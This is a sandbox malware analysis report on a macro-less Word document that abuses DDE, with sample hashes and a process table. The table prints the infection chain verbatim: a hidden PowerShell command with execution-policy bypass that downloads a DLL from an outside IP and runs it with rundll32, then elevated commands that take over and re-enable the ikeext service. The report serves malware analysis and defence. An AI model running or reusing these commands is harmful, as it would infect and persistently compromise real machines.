Macro-less Word Doc. uses DDE to Execute Powershell, Download DLL | VMRay Analyzer Report
Try VMRay Analyzer
Analysis Information
Creation Time 2017-10-11 13:00 (UTC+2)
VM Analysis Duration Time 00:02:16
Execution Successful True
Sample Filename exaai.doc
Command Line Parameters False
Prescript False
Number of Processes 21
Termination Reason Timeout
Reputation Enabled True
Download Archive Function Logfile Generic Logfile PCAP STIX/CybOX XML Summary JSON
VTI Information
VTI Score
100 / 100
VTI Database Version 2.6
VTI Rule Match Count 30
VTI Rule Type Documents
Tags
#malware
Screenshots
Monitored Processes
Process Graph


ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0x98c Analysis Target Medium winword.exe "C:\Program Files\Microsoft Office\Office15\WINWORD.EXE"
#2 0xa38 Child Process Medium cmd.exe c:\Windows\System32\cmd.exe /k powershell.exe -ep Bypass -w Hidden -noprofile -noexit -c IEX (new-object System.Net.WebClient).DownloadFile('http://213.183.51.187/debug.dll','%temp%debug.dll');rundll32.exe '%temp%debug.dll' HOK #1
#3 0xa50 Child Process Medium powershell.exe powershell.exe -ep Bypass -w Hidden -noprofile -noexit -c IEX (new-object System.Net.WebClient).DownloadFile('http://213.183.51.187/debug.dll','C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll');rundll32.exe 'C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll' HOK #2
#4 0xae4 Child Process Medium rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll HOK #3
#5 0xb54 RPC Server High (Elevated) dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{FCC74B77-EC3E-4DD8-A80B-008A702075A9} #4
#6 0xb74 Child Process High (Elevated) rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll SSSS #5
#7 0xb7c Child Process High (Elevated) cmd.exe C:\Windows\system32\cmd.exe /c "net stop /y ikeext" #6
#8 0xb90 Child Process High (Elevated) net.exe net stop /y ikeext #7
#9 0xb98 Child Process High (Elevated) net1.exe C:\Windows\system32\net1 stop /y ikeext #8
#10 0xba0 Child Process High (Elevated) cmd.exe C:\Windows\system32\cmd.exe /c "takeown /F C:\Windows\system32\ikeext.dll" #6
#12 0xbc0 Child Process High (Elevated) cmd.exe C:\Windows\system32\cmd.exe /c "icacls C:\Windows\system32\ikeext.dll /grant system:F" #6
#14 0xbe0 Child Process High (Elevated) cmd.exe C:\Windows\system32\cmd.exe /c "icacls C:\Windows\system32\ikeext.dll /grant administrators:F" #6
#16 0xc00 Child Process High (Elevated) cmd.exe C:\Windows\system32\cmd.exe /c "sc config ikeext start= auto" #6
#17 0xc14 Child Process High (Elevated) sc.exe sc config ikeext start= auto #16
#18 0xc20 Child Process High (Elevated) cmd.exe C:\Windows\system32\cmd.exe /c "net start ikeext" #6
#19 0xc34 Child Process High (Elevated) net.exe net start ikeext #18
#20 0xc3c Child Process High (Elevated) net1.exe C:\Windows\system32\net1 start ikeext #19
#23 0xcc4 Child Process Medium cmd.exe cmd /c ""C:\Users\BGC6U8~1\AppData\Local\Temp\iun4816.bat" " #4
#24 0xce0 Child Process Medium attrib.exe ATTRIB -h -s "C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll" #23
#25 0xce8 Child Process Medium ping.exe Ping 127.0.0.1 -n 3 #23
#26 0xd04 Child Process Medium cmd.exe cmd.exe /c exit #23
Sample Information
ID #19550
MD5 Hash Value 292843976600e8ad2130224d70356bfc
SHA1 Hash Value 31bad7ea8606e3e6d98692fa9f4b3f18ebb3c809
SHA256 Hash Value d5c27308f50a9c6d8ccd01269ca09a7a13e1615945b8047c4e55c610718e317e
Filename exaai.doc
File Size 19.98 KB (20457 bytes)
File Type Word Document
Has VBA Macros False
Analyzer and Virtual Machine Information
Analyzer Version 2.2.0
Analyzer Build Date 2017-09-28 17:24
Microsoft Office Version 2013
Microsoft Word Version 15.0.4569.1504
Internet Explorer Version 8.0.7601.17514
Chrome Version 58.0.3029.110
Firefox Version 25.0
Flash Version 10.3.183.90
Java Version 7.0.600
VM Name win7_32_sp1-mso2013
VM Architecture x86 32-bit PAE
VM OS Windows 7
VM Kernel Version 6.1.7601.17514 (684da42a-30cc-450f-81c5-35b4d18944b1)
Function Logfile
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefox with deactivated setting "security.fileuri.strict_origin_policy".


    
Screenshot
Expand-Icon
Exit-Icon
icon_left
icon_left
image